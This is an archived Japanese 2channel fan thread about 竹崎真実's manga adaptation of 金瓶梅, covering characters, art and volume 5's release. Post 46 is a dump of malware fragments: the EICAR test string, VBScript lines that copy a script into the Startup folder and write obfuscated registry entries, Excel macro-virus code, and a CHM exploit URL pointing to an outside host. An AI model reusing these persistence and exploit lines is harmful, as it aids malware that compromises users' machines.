5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●●竹崎真実スレッド●金瓶梅●● PART3

1 :金蓮さんっておかわいそう:2006/11/23(木) 12:18:03 ID:???0
「残グリ」等で活躍中の竹崎さんスレッドです。
金瓶梅以外も全作品を語り合いましょう。

大奥様とのお約束
「おまえたち、みんな仲良くしておくれ」

前スレ ●●竹崎真実スレッド●金瓶梅●● PART2
http://comic6.2ch.net/test/read.cgi/gcomic/1146065229/

関連スレ 【ぶんか社】いちばん残酷なグリム童話・4
http://comic6.2ch.net/test/read.cgi/gcomic/1157028104/

オフィシャルサイト「邯鄲の夢」
ttp://www.linkclub.or.jp/〜mamineko/

金瓶梅「原典」
小野忍,千田九一訳 岩波文庫全10巻
村上知行訳 ちくま文庫

2 :花と名無しさん:2006/11/23(木) 19:54:22 ID:???0
>>1


3 :花と名無しさん:2006/11/23(木) 20:42:39 ID:???0
乙ー!

つ随喜

4 :花と名無しさん:2006/11/24(金) 01:09:19 ID:???0
>>1姐さま乙です
つ随喜

今回のスレも、大奥様のお言葉を胸に仲良く使いましょう
そろそろ発売日が近付いてきましたね

5 :花と名無しさん:2006/11/24(金) 01:20:39 ID:???0
一乙!
つ王偉

ぎゃー、もう1ヶ月経ったのか…
次号は金蓮姐さんが瓶児を瞬殺しそうな勢いだけど、
瓶児もねばれ!でないとつまらん!

6 :花と名無しさん:2006/11/24(金) 08:09:34 ID:???0
>>1乙じゃなきゃいやだぁー!
つ梨

7 :sage:2006/11/24(金) 16:31:35 ID:1cPK+zS50
単行本もってるんだけど、気付いたら旦那が読んでた
なんて声をかけたらよいのやら・・

そこらへんに、置きっぱなしの私が悪いのだけど・・・
隠すのもなんだしなぁ



8 :花と名無しさん:2006/11/24(金) 16:33:02 ID:???0
↑ミスったww


9 :花と名無しさん:2006/11/24(金) 17:51:03 ID:???0
>>7
「旦那様、お慕いしております」

と声をかけなさい。

10 :花と名無しさん:2006/11/24(金) 18:40:55 ID:???0
>>1
乙華麗です。

>>7
金蓮たちの絡むシーンをわざと見せて、めくるめく愛の世界へ
誘うのですw

11 :花と名無しさん:2006/11/24(金) 19:18:48 ID:???0
>>1
乙ですありがとう

>>7
ワタシも彼氏に単行本見られた時はヤバッと思ったけど、
どうも気に入ったらしく、毎月残グリ買ってきてくれるように!(コンビニから)
キンベだけ読んでワタシにくれる
大奥さまと金蓮がお気に入りみたいだよ

12 :花と名無しさん:2006/11/24(金) 23:22:56 ID:???O
男性も金蓮や大奥様が好きなんだね。
意外だけど竹崎キンペでよりかっこよく描かれてるのは
その二人だから妥当か。

13 :花と名無しさん:2006/11/25(土) 00:58:27 ID:???0
原点の読者層はどんな感じだったのだろうか
男性が好んだのか、はたまた女性か。

14 :花と名無しさん:2006/11/25(土) 01:36:16 ID:LiEu2aPH0
明代や清代は男性だっただろう。女性はほとんどが文字が読めなかったし。

エイミ・タンの「キッチン・ゴッズ・ワイフ」で、民国時代のヒロインが
不良の同級生にこっそり金瓶梅を借りて読む、というのがあったなー。
セックスについての本だと言われたけど、上司にはいつどんな贈り物を
すればいいのかとか、常識的なことが書いてあるだけだ、という感想だった。

15 :花と名無しさん:2006/11/25(土) 10:29:17 ID:???O
即死防止

文庫の続刊が楽しみでなりませぬ。
たまには大奥さまの笑顔も見たいものですわ。

16 :花と名無しさん:2006/11/25(土) 11:37:50 ID:???O
五巻はどの話が入るのかな。
大旦那様くる?

17 :花と名無しさん:2006/11/25(土) 23:54:37 ID:???0
前スレ1000、野暮なやつ。

18 :花と名無しさん:2006/11/25(土) 23:55:30 ID:???0
前スレ1000〜。初めて取ってうれしいのはわかるが梅の字を入れてからにしろw

19 :花と名無しさん:2006/11/26(日) 00:00:34 ID:???0
最近IEだと夜に少女漫画板が見れない時が多いね。

今はまってるマンガあったら教えてと言われて金瓶梅と答えそうになったけど
よく考えたら誰にでも薦められる内容じゃないから言えなかった。
こんなに面白いのに…!orz

20 :前スレ1000:2006/11/26(日) 00:05:14 ID:???0
ゴメンナサイ・・・(′ ; ω ;`)

21 :花と名無しさん:2006/11/26(日) 00:34:47 ID:???0
>>19
つ 専用ブラウザ

22 :花と名無しさん:2006/11/26(日) 01:24:54 ID:???0
5巻待ち遠しい〜〜〜

最近よく人大杉で、にぎわっていいことなんだけどちょっと寂しい。

23 :花と名無しさん:2006/11/26(日) 01:48:18 ID:???O
>>19
同じくw
ただのエロ漫画じゃないし、勧めるに値すると思うけど相手を選ぶな。
今のところ妹と彼氏とオタ友二人にしか読ませてない。

24 :花と名無しさん:2006/11/26(日) 09:07:06 ID:???0
レディコミだからHシーンはしょうがないけどあっさりだし悩むよね
内容はある漫画だからHシーンがもう少し押さえられれば薦められるんけど
でも少女コミックなんて少女マンガのくせにHシーン多いし、その上内容ない漫画も多いし。
そういうのに比べたら、いい漫画だと思う

25 :花と名無しさん:2006/11/26(日) 11:19:11 ID:???0
間違って今月もほん怖買ってしまった
読み返すことはないな・・・


26 :花と名無しさん:2006/11/27(月) 12:18:47 ID:???0
竹崎真実さんの描く女性の体系はちょっと変ではないか?
肩幅はせますぎるとか頭がでかいとか、色々。

27 :花と名無しさん:2006/11/27(月) 13:23:42 ID:???0
>>26
色っぽくて美人ならそれでいい。別に気にならん。

28 :花と名無しさん:2006/11/27(月) 13:52:06 ID:???O
正直上手くはないけど
漫画は絵柄だけじゃなく、構成とか台詞も含めてトータルで見るもんだと思うから気にならない。

29 :花と名無しさん:2006/11/27(月) 17:56:31 ID:???0
冷静に、「今月の旦那様はあごが長すぎだな・・・」
って思う程度。

30 :花と名無しさん:2006/11/27(月) 21:02:14 ID:???0
人体解剖図みたいな完璧なデッサンでも
内容が面白くないマンガはカス。


逆もありってこと。

31 :花と名無しさん:2006/11/27(月) 22:05:23 ID:???0
初代スレでは絵が上手いってレスが度々あってえ?
な気持ちになったなぁ。
絵は下手だけど雰囲気あるし、書き分けもできてるほうだからいいんじゃないかな。
何より話が面白い。

32 :花と名無しさん:2006/11/27(月) 22:18:56 ID:???0
たまにデッサン崩れてるかなと思うときもあるけど平気。
話も勢いもいいし。

33 :花と名無しさん:2006/11/27(月) 23:51:21 ID:???0
絵はしっかり基礎が出来てるよ。
そうでなきゃ、あの雑さでちゃんと「読めて、見られる」漫画は成立しない。
でも、もう少し丁寧に描いて欲しいな。絵に対する情熱が薄そう…。
アゴが人外気味なのは個性なんだろう、時々目を背けたくなるときもあるがw

なんにせよ、お話を作る力が竹崎さんは飛びぬけて上手。


34 :花と名無しさん:2006/11/28(火) 08:34:44 ID:???0
「絵が綺麗」の基準って人によって違うしね。
私は竹崎さんは十分綺麗な方だと思ってるけど
なんか世の中には「デッサンデッサン」「構図構図」…みたいに
絵の技術のあら探ししかしないマンガオタクって人種もいるみたいだし。

ほんとにただ読む方としては絵は綺麗な方がいいけど
絵よりもまず面白いか面白くないかの方が重要だっての。


昔似たようなことをなんかの講義で聞いたんだけど
ある地方の特産品でそうめんか何かのパッケージを有名なデザイナーに頼んで
実際にすごく綺麗だし素晴らしい物が出来上がった。
その年のデザイン賞もいくつも取ったり。
でもそうめんはほとんど売れなかった。

…お菓子かチョコかワインだったらいいけどね…これ、そうめんだよね?
こんなパッケージに入ってるそうめんなんて確かに買う気になれない、
っていう代物だったw


35 :花と名無しさん:2006/11/28(火) 11:25:31 ID:???0
そうめんw竹崎さんの描く顔はバタ臭い顔だから最初は中国なのにーと違和感あったけど
今はむしろこの顔じゃなきゃダメって感じだw
早くコミクスでないかな。ずっと待ってるんだけど。

36 :花と名無しさん:2006/11/28(火) 12:03:34 ID:???0
西洋物も描いて欲しい…
王妃視点の眠り姫は自分の中では神作品

37 :花と名無しさん:2006/11/28(火) 13:50:09 ID:???0
>>34
本当基準って違うしね。
「絵がうまい」って自分だとデッサンとかじゃなく表情とか
そのシーンにあった描写も入るからなぁ。
(例えば大奥様と旦那様の雨のキスシーンとか)

竹崎さんのは読みやすいと思う。
本誌だとストーリー良くてもコマ割りのせいかなんか読みにくい人とかいるし。

38 :花と名無しさん:2006/11/28(火) 19:21:50 ID:???O
「上手い」のはデッサンばっちりで写実と虚構がマッチし、ペン線も歪みなく美しく
背景や服の模様にいたるまで緻密…というイメージ。
そういう点で言えば「上手く」はないけど台詞やストーリーで
印象に残るシーンがたくさんあってそっちの方がずっといい。
絵柄で漫画好きになるタイプもいるみたいだけど私は内容重視だから気にしない。

39 :花と名無しさん:2006/11/28(火) 19:28:08 ID:???0
竹崎さんはここぞという時に目に力のある絵が描けるから好きだ
欲を言えば線をもう少し丁寧にしてほしいけど

40 :花と名無しさん:2006/11/28(火) 19:59:43 ID:???O
漫画は絵柄の華やかさや見せ方やストーリーやセリフなど
色々な技術とセンスの総合で魅力が決まるので
竹崎さんは「デッサンは下手だが漫画を描くのは上手」だと思う。
他の要素が魅力的なだけに「これでデッサンさえ狂わなければ完璧なのに…」と
玉にキズな印象が強くなるんだろうな。旦那様のアゴは少々難ありだけどww

41 :花と名無しさん:2006/11/28(火) 20:29:58 ID:???0
竹崎さんは年寄りを描くのがうまいと思う。というか男全般かな。
いい男はいい男らしく、ブサはブサらしい。
出張で描いてた南岳さんとゆかいな仲間達とかかわいいジーサンだったよ。
若い南岳さんもカコイイ!ブ゙ショウも黙って立っていればね……。

42 :花と名無しさん:2006/11/28(火) 22:23:08 ID:???0
それ思った>男性・年寄りが上手い

女性の作家って若い美男美女は描けても
年寄りとかブサは下手って人多いもんね。
そういうキャラだけ自分の絵にしきれてなくて浮いてたりw
竹崎さんの年寄りやブサキャラはちゃんとそう見えて
なおかつ不快だったり浮いてる感じじゃなく
ちゃんと可愛げや魅力もある。

43 :花と名無しさん:2006/11/29(水) 16:47:49 ID:???0
秋菊とキン連の確執を楽しみにしているんだけどまだかな。
漫画でそれっぽい事がある事をにおわせたような話があった気が。

44 :花と名無しさん:2006/11/29(水) 18:36:58 ID:???0
自分の代わりに指の骨折るお仕置きを受けてくれる奥様を裏切ったりはせんだろ
秋菊は原作どおりにはならないと思う

45 :花と名無しさん:2006/11/29(水) 20:09:08 ID:???O
そんな話あったのか!
見てないなあ。
単行本になるのはいつか…

46 :<body onload=window()>:2006/11/29(水) 23:46:55 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

47 :花と名無しさん:2006/11/29(水) 23:51:18 ID:???0
最新刊読んできた!
やっぱフウさんこえぇぇぇぇ。
ヘイジ…やっぱそういう女かwww

48 :花と名無しさん:2006/11/30(木) 00:45:28 ID:???O
最新刊見てぇー
竹崎さんの描くじっちゃんばっちゃんが好きだー

49 :花と名無しさん:2006/11/30(木) 08:49:55 ID:???0
>>47
でもさ、フウと王婆じゃなんかレベル違う気がするっていうか。
陰謀のレベルは同じでも、繋がり具合っていうか?

金蓮姉さん、一気に不利なんじゃないかなあ。
まあ今まで結構一人勝ちだったから、話的にはこれで
バランスが取れるのかな?

50 :花と名無しさん:2006/11/30(木) 10:06:32 ID:???0
ある意味フウVS王婆?
王婆も金ヅルいなくなったら困るからちゃんと金蓮の味方するだろうし。

腹の読めない人よりお金が続く限り味方でいる王婆の方が
金蓮の立場から言うと付き合いやすそうだと実感した。

51 :花と名無しさん:2006/11/30(木) 13:55:08 ID:???0
>>49
レベルって言うか、同じ策士でも異質な感じはするよね。
原料が同じ麦でも、麦茶とビールみたいな・・・。


って変な例えすまそorz

52 :花と名無しさん:2006/11/30(木) 15:32:19 ID:Tv2bSP8T0
次、金連とフウさんがどうやって瓶児を突き落とすのか楽しみ!

53 :花と名無しさん:2006/11/30(木) 16:05:00 ID:???O
>>51
分かる。
凹バは処方を守れば害の無い市販薬なイメェヂだが
フゥは…毒っつーか麻薬?口当たり良い分コワい

54 :花と名無しさん:2006/11/30(木) 19:26:26 ID:bhhZlzAn0
前から気になってたんだが 奥方の麻雀の並べ方
おかしくないか? 四角くくっついて並んでる。


ってどうでもいいか・・・・

55 :花と名無しさん:2006/12/01(金) 00:03:17 ID:murQd/cG0
読んだ。


 フ ー コ エ エ エ エ エ エ エ エ エ !!!!!




あと、瓶児出産はほぼ確定?

56 :花と名無しさん:2006/12/01(金) 01:48:24 ID:???0
mjk!?>瓶児出産



なんか・・・_| ̄|○

57 :花と名無しさん:2006/12/01(金) 03:20:06 ID:oskRrupqO
今月は久々にエロ面白かった。

乳首を染める…

58 :花と名無しさん:2006/12/01(金) 08:43:26 ID:???0
>>57
瓶児の娼館での格好も「うへえ」ってくらいエロかったねw
久々にレディコミを実感した。

59 :花と名無しさん:2006/12/01(金) 08:53:32 ID:???O
これからの展開楽しみ。久々に黒い金蓮姐さんも見れたし。
姐さんは悪の華でいて欲しい。

60 :花と名無しさん:2006/12/01(金) 18:26:25 ID:???0
今月号読んだ。
フウおばさんのおかげで、最近マンネリ気味だったのが
俄然緊張感に満ちてすごくワクテカ。
金蓮・王婆とフウ・瓶児(無自覚)が繰り広げられるのだろうか。


61 :花と名無しさん:2006/12/01(金) 20:12:06 ID:???O
既にどこの本屋にもなかったorz
つーかあと三回で最終回なの?

62 :花と名無しさん:2006/12/01(金) 20:43:33 ID:???0
今月号今日読んだ!おお、これがこのスレで話題のフウさんか!!
頭良さそー。つか平次は体柔らかいねwビックリしたよw

だんな様がピンチの姿もめずらしい。
>>61本当?もっと続けて欲しいな・・・。

63 :花と名無しさん:2006/12/02(土) 00:38:29 ID:???0
名前をうっかり忘れたけど、今月号の旦那様の浮気相手の子がかわいくて頭も良い子で
気にいった。あんな男の妾にはもったいないなぁ〜
フウさんは何が目的なんだろう?お金かな?もしくは西門家に恨みがあるとか。
今後がすごく楽しみ!

64 :花と名無しさん:2006/12/02(土) 12:14:04 ID:???0
渡月、良かったね。
打算的でないけど、しかし茶目っ気もある。桂姐に似てるかも。

瓶児本当に子ども産むかなあ。でも馮の見立ては外れなさそうだしな。
大奥様は子なしケテーイ?
原典では旦那様が死んだ瞬間に生まれ変わりの子を産む話が
結構好きなんだけど。
一度流産してるしね。

65 :花と名無しさん:2006/12/02(土) 15:31:57 ID:???0
渡月だったら西門家にきても自分の立ち位置しっかり把握して
金蓮姐さんや大奥様とも上手くやっていけたと思う
切ないいいキャラだった

フウさんの見立て大奥様やセツガ姐さんのとこは悲しいなと思ったけど
キョウジ姐さんのとこはヒデーwwwと思ってしまった


66 :花と名無しさん:2006/12/02(土) 18:26:10 ID:???O
ガイシュツだったらスマンが、コミクス5巻、12月5日に発売だそうですよ。待ちに待ちましたーっ!

そして・・・フウさんコワス(((;゚Д゚)アワワワワ 王婆との因縁も気になるけど、あと三回で全てケリを付けられるのかなー?だけど竹崎先生も働きすぎだと思うから、少し休ませてあげたい・・・。

67 :花と名無しさん:2006/12/02(土) 18:59:28 ID:???0
えーじゃあ本当にあと3回なんか。
金蓮瓶児ハルマゲドンで終わるんだな。スゴス…

68 :花と名無しさん:2006/12/02(土) 19:49:57 ID:???0
本当にあと三回だとしたら、ものすごく駆け足の展開になりそう。
竹崎さん今でもすごく大変そう(絵が雑なこと多々)だけど、
じっくりと丁寧に、時間をかけて登場人物を描いて欲しいなー。

69 :花と名無しさん:2006/12/02(土) 21:01:30 ID:???0
「三回」って、ほん怖と残グリにまたがって連載したいわばフウばあさん登場編が
今回の残グリで終わりです、という意味でカラーページに載っているの以外に
何かあった?

なんか暫く前から「特別編が三回で終わり」と「連載自体が終わり」と
ごっちゃにしている人が出てきているようだが。

70 :花と名無しさん:2006/12/02(土) 21:11:25 ID:???0
5巻フラゲ記念カキコ

71 :花と名無しさん:2006/12/02(土) 21:40:54 ID:???O
五巻マジ発売なの?
本屋の表にはぶんか社の欄になかったんだが…

あと三回で終わりなのはフウ編でキンペ自体ではないの?安心した。
グリムの看板だし簡単にやめないとは思うけど竹崎さんに休んでほしい気も。


72 :花と名無しさん:2006/12/02(土) 22:36:40 ID:???0
5巻今日セブンアンドワイで買ったよ。
金瓶梅まだ終わらないで欲しい。

73 :花と名無しさん:2006/12/02(土) 22:45:00 ID:???O
5巻GET
玉桜好きには嬉しいおまけだった。
紫雲は同人板でみかけた、おしかけ厨とかいうのそのもので、いらついた。
金蓮のおしおきでスッキリ。

面白い漫画だから、本当に終わるなら惜しすぎるよ。
せめて未消化の伏線を片付けてほしい。


74 :花と名無しさん:2006/12/03(日) 00:33:23 ID:???0
いいなあ。明日探してこよう。

今月号見つけられなかったので四谷怪談買いました。
ストーリーはどれも良かった。
表題の四谷怪談はほろりと来たよ。
みにくいアヒルの子は何を伝えたいのかちょっと分かりかねたけど
激痩せした女の子が怖くてすごい。
あと竹崎さんのセクロスシーンって上品だけど
官能は感じないなあ…と思っていたら
じゃじゃ馬ならしとジキル博士とハイド氏はエロかったwww
金瓶梅もごく最初の旦那様と金蓮の不倫シーンはエロかったな。

75 :花と名無しさん:2006/12/03(日) 00:38:26 ID:???0
みにくいアヒルの子、自分は好きだ。
今時のダイエットブームに警鐘?とまで言いたいのかは分からないけど。
一人の女の子が成長する過程として上出来!だと思う。
四谷怪談は文句なし!

5巻はやくほすぃ!

76 :花と名無しさん:2006/12/03(日) 01:24:30 ID:???0
こちらのスレあまり来てなくて、過去ログ読んでない上の質問ですまぬが、
「金瓶梅」わたなべまさこ版も読んでる住人さん、いますか?

雑誌でわたなべ版を少し読んだら、あっちも面白いんだけど
残念ながらコミックス化が途中でストップ。
竹崎版の方がどんどん進んで、文庫化も順調な様子。
原典は同じようなものを使ってると思うので、あとはアレンジや
絵柄の問題だけと思うんだけどね。

77 :花と名無しさん:2006/12/03(日) 01:32:21 ID:???0
5巻、このスレに来て発売を知る→密林へGo!
もう売り切れだって?!!!((( ;゚Д゚)))ガクガクブルブル
最初から取扱数量が少なかったのだろうか?
↓↓↓
まんがグリム童話 (金瓶梅5) (文庫)
在庫状況(詳しくはこちら): 現在、在庫切れです。

78 :花と名無しさん:2006/12/03(日) 02:38:58 ID:???0
うそー。在庫切れ?

自分本屋で働いてるから、入荷したら荷から速攻で抜くぞ。


79 :花と名無しさん:2006/12/03(日) 03:14:32 ID:???0
>>77
正式にはまだ発売日前だからじゃね?

80 :花と名無しさん:2006/12/03(日) 04:11:46 ID:???0
>>79
他作家で12/21発売予定のコミックスの場合
→近日発売 予約可
→在庫状況:ただいま予約受付中です。
って表記されてたんだ…。(´・ω・`)

81 :花と名無しさん:2006/12/03(日) 12:53:09 ID:???0
>>80
密林ではたまにあるよ。正式には発売前だけど
もう本が流通してる時とか一時的に「売り切れ」表示になる。

正式な日程が12/5なら、5日になれば買えるようになる…かも?w

82 :花と名無しさん:2006/12/03(日) 13:09:10 ID:???0
五巻、7あんどYで今ポチってきた
密林たまにすっごく遅れて届くから苛つくんだよねえ
田舎だから本屋で並んでないんだ

83 :花と名無しさん:2006/12/03(日) 14:41:42 ID:1xT9xcYPO
大旦那といいふう婆さんといい大物悪役が登場するたびに武松の小物ぷりがよくわかる。
あいつマジでもう必要ないな

84 :花と名無しさん:2006/12/03(日) 15:58:57 ID:???0
なんかね、俺はいつかビッグになってやる!
とかいいつつ、働きもせず夢ばかり語って
女に食わしてもらってるどうしようもない
口だけ男みたいで情けないよね。

男の癖にぐちぐちねちねち女々しいったらありゃしないし。

ビジュアル的には好みなのに、もったいないような気もする。
もう少しまともなキャラだったら良かったのに…



85 :花と名無しさん:2006/12/03(日) 16:14:45 ID:???O
原点では武松は最後の勝者になるみたいだけど、竹崎さんは復活させる気なさそうだね。
他のキャラが大物すぎて今更存在意義を感じないし本当にあぼんしたっぽいしなあ。
うんかは生き延びたけど、武松が死んだなら生きてる意味ないと後追いしそう。

86 :花と名無しさん:2006/12/03(日) 16:34:27 ID:???0
武松が勝者=最終回だからなぁ(原典通りだと)
その前に旦那様あぼーんしちゃうし
最終回になったら寂しいけど、どういう決着の仕方にするのか楽しみだ

87 :花と名無しさん:2006/12/03(日) 17:11:07 ID:???0
原作は旦那が死んでから金蓮が死ぬ、春梅が死ぬまでが結構長いからねー
小説で読む分にはいいが、マンガにはなりにくい
どんな話か想像つかないけど、最終回はオリジナルになるだろうね

88 :花と名無しさん:2006/12/03(日) 17:13:35 ID:???0
過去に自分もされてるとはいえ
陥れといて、あのバカ!はあんまりだぜ姐さんw

89 :花と名無しさん:2006/12/04(月) 01:14:05 ID:???0
けっこう最後は原作通りだとさびしい最後になるんだね・・・。
漫画でそれやられたら鬱だわ…w
金連のいない金瓶梅なんて!
オスカルのいないベルバラ状態・・・!いや、あれは最後まで見てみたかったが。

90 :花と名無しさん:2006/12/04(月) 01:30:11 ID:???O
旦那様が手を出す女サブキャラは
厚かましくて変な騒動を起こす奴が多かったけど、渡月は珍しく良い子だったね。
韓予が瓶児を気に入ったんなら熨斗つけてくれてやればいいのに。
まあそれじゃ面白くないし、やはり金瓶梅には瓶児が必要なんだな。

91 :花と名無しさん:2006/12/04(月) 04:14:51 ID:O/TMsi200
五巻、購入しました。

巻末の玉楼紹介が好きです。
一番地味だけど読んでいて安心できるキャラなので好きです。

金蓮と瓶児が宦官の化粧品で肌荒れを起こした挿話も
嬌児や雪蛾は冷笑的なのに
彼女だけが自分の身に引き付けて哀しく思う描写も良かったです。

金蓮の様な利発さや大奥様の様な聡明さはないけれど
その分毒や息苦しさを感じさせない優しさがある。

92 :花と名無しさん:2006/12/04(月) 04:23:55 ID:???0
>>90
地下牢に落とされた恵蓮とかちょっと極端でしたよね。

金蓮に先を越された嫉妬心と
自分を認知してくれない旦那様への苛立ち、
意に沿わない男に連れ添っている鬱積から半ば狂気に陥っていると解釈しても
春梅に裸で車を引かせるのは当時の感覚としてもありえない。

そもそも屈強な大人の男でやっと引ける車を
小娘の春梅が引けるわけがないし。

93 :花と名無しさん:2006/12/04(月) 04:52:12 ID:???0
>>90
未遂を含めて旦那様と関わりをもつ女サブキャラて
春梅くらいの年配の少女
(オバQ娘蘭香、猿が友達の田舎娘、ガリガリの少女娼婦)だと
途中で痛い目に遭ってもそこまで不幸な結末にはならず
話の後味も悪くない場合が多い。
国府長官の娘で嗜虐趣味の李鳳は圧死するけど
「こんなスポイルされたガキは死んで当然」と思わせる展開になっているから
そこまで話の後味は悪くない。

でも金蓮と同年輩以上の女だと
恵蓮といい偽金蓮の小玉といい
本人の自業自得と位置づけてもなお嫌な後味の残る結末が多い気がする。

94 :花と名無しさん:2006/12/04(月) 05:06:29 ID:???0
地味で冴えない女が
金蓮との同一化願望の果てに
自滅する話は個人的に凄く痛みを感じた。

小玉はもともと月娘奥様の侍女で
「奥様の命令で無理やり今の夫と結婚させられた」
と金蓮になりきった小玉が語るくだりがあるけれど
月娘は小玉の本質に気付いていたのだろうか。

末尾で噂している時に月娘の姿がない点も気に懸かる。

95 :花と名無しさん:2006/12/04(月) 16:04:36 ID:qH21nbIG0
>月娘は小玉の本質に気付いていたのだろうか。
不始末したら床下に落とせばいいから。

という冗談はともかく、大奥様の家から来た抑圧おばさん
(名前忘れた)にしても小玉にしても馮にしても、
大奥様は召使に関しては性善説で全然疑ってない感じだな。
ちょっと意外だが、滅多に人を疑わない原典の月娘の性格に近い。

96 :花と名無しさん:2006/12/04(月) 16:48:01 ID:???0
>>92
あのての車は女の人1人でも引けるよ
大掛かりなのじゃないっぽいし

97 :花と名無しさん:2006/12/04(月) 16:54:08 ID:???0
腹黒だろうと欲深だろうと旦那様をたぶらかそうと、
西門家の名誉を傷つけなければOKって考えていそう。
寛容で大らかな人、と周りから思われていないと、
大きな家を切り盛りできないと思う。
疑り深く細かいことに口を出す性格だと、人はついてこないし。
でも一線を越えた者には容赦しない、という要素も、
人の上に立つには不可欠なものなんだろう。

98 :花と名無しさん:2006/12/04(月) 21:20:32 ID:???0
5巻買ったー

…秋菊が一番好きなだけに辛かった…
その後、金蓮姐さんが不埒な男と瓶児にお仕置きしてくれたからスカッとしたけど。
旦那様が慰めてくれたけど、これから先ささやかでも良いから秋菊には幸せになって欲しい…

紫雲と金雲は…>>73と同じ様に同人板での押し掛け厨だなと思った。
「アテクシはあんたの心の友なのよ!だから旦那様を寄越せっふじこ!!」って感じ。

ただし、金雲は押し掛け厨に巻き込まれた被害者ですが…。
(同人板とか合宿所で押し掛け厨に無理矢理連れて来られた人…って言うのがいるから…)


ネット販売のページで金瓶梅の紹介文でウケた。
「この巻から金蓮姐さんが良い人になっていき、瓶児がどんどんバカ女になっていきます(笑)」
確かにその通り(藁)

99 :花と名無しさん:2006/12/05(火) 00:29:27 ID:???O
そうだねー。紫雲の言動があまりにも厨テンプレだったから、
作者はその手の被害体験者かと思った。
あるいは2見てるかW

100 :花と名無しさん:2006/12/05(火) 00:40:30 ID:???0
自分、ID変わっているかもしれんが>>98なんだが、…金雲でなくて「黄雲」だったよ…


…瓶児並みの馬鹿さ加減…orz


先生、2を見てるっぽいなぁw

101 :花と名無しさん:2006/12/05(火) 01:17:22 ID:???0
何もせず愛らしいだけの瓶児に馮の知恵が加わったら最強だろうな
瓶児の弱点って精神の幼稚さと頭の悪さだから、馮がいれば完璧にカバー出来る

馮ばあさんの狙いは「瓶児に子どもを産ませて傀儡に仕立て上げること」っていうことは、
最終目的は、後継ぎの母になった瓶児を正妻かそれと同等の地位に押し立てて西門家を裏で牛耳ること?
前の家では奥様同士のバランスを崩し過ぎて失敗してしまったとか…

102 :花と名無しさん:2006/12/05(火) 02:08:07 ID:???0
牛耳ると言うか、奥様方のバランス崩して
家を滅ぼすことそのものが目的だったりして。
妾一杯大金持ち、自体に恨みがあるとか。

103 :花と名無しさん:2006/12/05(火) 02:30:37 ID:???0
もっと発展して大旦那様が元仕えていた家が没落した原因だったりして。
で、西門家に復讐にやって来てんだけど途中で真実に気付いて…

……なにか違うな…

104 :花と名無しさん:2006/12/05(火) 12:15:08 ID:???0
>>95
94ですが、月娘は自分や西門家そのものに挑発的な態度を取らなければ
基本的に疑念を示さないのかもしれませんね。
小玉も月娘奥様や西門家そのものに害を加える意思はなかったし。
>>96
92ですが、女性一人でも簡単に引けるとは知りませんでした。
確かに恵蓮が乗っていたのは簡単な作りの車みたいでしたね。
でも普通の歩行も困難な纏足女性ならそれでもかなりきついような。
春梅は女中格だから纏足はしてないのかな。

105 :花と名無しさん:2006/12/05(火) 13:44:03 ID:???0
>普通の歩行も困難な纏足女性

時々この手の話出てくるけどこれは漫画だからとしか言えないんじゃないかな
ごく普通に歩いてるし走ってるとこまであるし
リアルと比べるのは無理があると思う

106 :花と名無しさん:2006/12/05(火) 18:00:10 ID:???0
5巻読んだ。面白かったー。
5巻はだんな様が切れたり気疲れしたりさびしい思いをしたりで面白かった。
山芋プレイワロタwあれってあんなにかぶれるんだ。しかし酢かよ。

107 :花と名無しさん:2006/12/05(火) 21:32:23 ID:???0
ふと思ったんだけど旦那様が就職している刑方面のお役人って恐妻家が多いですね
旦那様はいうまでもなく、今月の上司もかなりの恐妻家だし。
さらにマージャン養子で登場した旦那様の同僚もこわーい奥様いたし(大奥様とお友達というのがまたなんとも)
ずっと前に登場して金蓮姐さんをレイプして最後は真珠いりのモノをなくして宦官になってしまったクサレも恐妻家に三行半だったし。
個人的には、あのマージャンのエピで浮気が奥様にばれた旦那様の同僚さんが、あの後奥様にどんなお仕置きくらったのかすごく気になる。

108 :花と名無しさん:2006/12/05(火) 22:07:01 ID:???0
>>107
役人の正妻ならそれなりの家柄の女性がほとんどでしょうし
刑方面て実質はともかく表向きは
品行の良い人を装わなくてはいけないから
正妻との連係プレーがどうしても必要になってくるからではないでしょうか。

役所の性格上、他の方面の役職より賄賂や情実が多いと推察されるから
正妻の器量がかなりものを言うだろうし。

109 :花と名無しさん:2006/12/05(火) 22:16:19 ID:???0
役人クラスの家柄にはどの家でも
月娘様の地下牢レベルの恐ろしい仕掛けが
正妻に代々受け継がれているのだとしたら
旦那様も粗略には出来ないんでは。

110 :花と名無しさん:2006/12/05(火) 22:55:30 ID:???O
5巻は
月娘奥様まで厨房で食べてたのがワロタ

111 :花と名無しさん:2006/12/05(火) 23:16:52 ID:???0
だんな様は秋菊みたいな暗い子は苦手だと言っていたくせに占い好きで根暗な
女性を奥様にしている件。

112 :花と名無しさん:2006/12/05(火) 23:30:44 ID:???0
>>111
生真面目でしかも処女(実質的・精神的に)の女中の秋菊は
手を付けたらその後の処遇も含めて大変だけど
玉楼は一応未亡人だから男に対してはある程度経験と免疫があるし
自分の財産も持っているからその違いでは。

玉楼は塞ぎ込んでも自殺は考えなそうだけど
秋菊は扱いを誤ったら最悪自殺しかねない。

113 :花と名無しさん:2006/12/06(水) 00:41:29 ID:???0
>>美貌の未亡人

って所にグッときたんだと思ってた。
